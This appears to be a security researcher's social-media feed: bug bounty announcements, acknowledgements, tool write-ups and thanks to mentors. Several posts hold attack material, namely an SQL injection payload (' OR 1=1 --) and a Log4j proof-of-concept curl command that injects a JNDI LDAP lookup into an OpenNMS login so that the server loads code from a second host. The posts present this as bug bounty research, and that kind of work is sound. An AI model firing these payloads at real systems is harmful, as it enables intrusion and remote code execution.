
MahMoud Elkot
@0xElkot
Cyber Security Consultant | Security Researcher (Part time)
Cairo
Joined July 2016
Ever wished Shodan gave you data in 1 click instead of hours of copy-paste? 👀 I built Shodan Page Scraper 🕵️♂️ – a Chrome extension that rips:
✅ IPs
✅ Open Ports
✅ Subdomains
✅ DNS records
⚡ Idea came from @GodfatherOrwa during .
#PHdays #BugBounty #Shodan #Infosec #RedTeam
🔍 Tip for finding SQLi in WordPress plugins:
- Study the code—check $wpdb queries & inputs.
- Enumerate endpoints, forms, params w/ WPScan or manually.
- Test for SQLi w/ payloads like ' OR 1=1 --
💡 Might lead to a private CVE! Stay ethical.
#BugBounty #SQLi
A new acknowledgement from @Apple for finding some vulnerabilities on one of the main domains. #bug_hunting #bugbounty #xss #apple
A new write-up for automating XSS. Note: I illustrate Xray installation here too. #BugBounty #bugbountytips #xss
0xelkot.medium.com
So let’s start :)
I have found about 50 XSS on a single program, using my automation progress that you will find here and @SirBagoza's tips in his videos. #bugbountytips #xss #hackerone #h1
Hi guys, if anyone is interested in bug bounty automation, see this article. #bugbountytips #SQLi #XSS #LFI #Recon
When I pentested a project, I found it uses the WordPress CMS. So I thought to get some juicy endpoints from /wp-json/. So I decided to create a Python script to extract all endpoints and URLs from the wp-json URL. GitHub link: #cyber_security #wordpress #Pentest
My journey started in 2019 with @NakerahNetwork, then @3XS0 supported me in a lot of cases and scenarios. Now I would like to thank you from all my heart; I am here in this community because of you and your continued support.
I would like to thank all of you, @NakerahNetwork & @0xMuhammad, for being the reason for starting my journey and being with me as a mentor. Now I have discovered more than 300 vulnerabilities and Get in more 5 Engagements. Special thanks to my all-time supporter @3XS0. #bugbounty
Hi guys, if anyone is interested in bug bounty automation, see this article. #bugbountytips #SQLi #XSS #LFI #Recon
0xelkot.medium.com
Hello all, My name is Mahmoud Attia aka 0xelkot
Based on my last comment with @GodfatherOrwa and @eslam3kll, this is the template of SQLi detection.
Steps:
1- Catch all requests of parameters.
2- Grep reflected parameters with gf and Kxss.
3- Fire this template.
#happy_hacking #bugbounty
PoC:
curl -X POST -k --path-as-is http://192.168.0.140:8980/opennms/j_spring_security_check -d 'j_username=${jndi:ldap://192.168.0.140:1389/serial/CustomPayload}&j_password=abcd&j_usergroups=&Login='
#BugBounty #Log4j
Some achievements from Microsoft:
MS-500
SC-300
SC-200
#security #CyberSecurity #BugBounty #Microsoft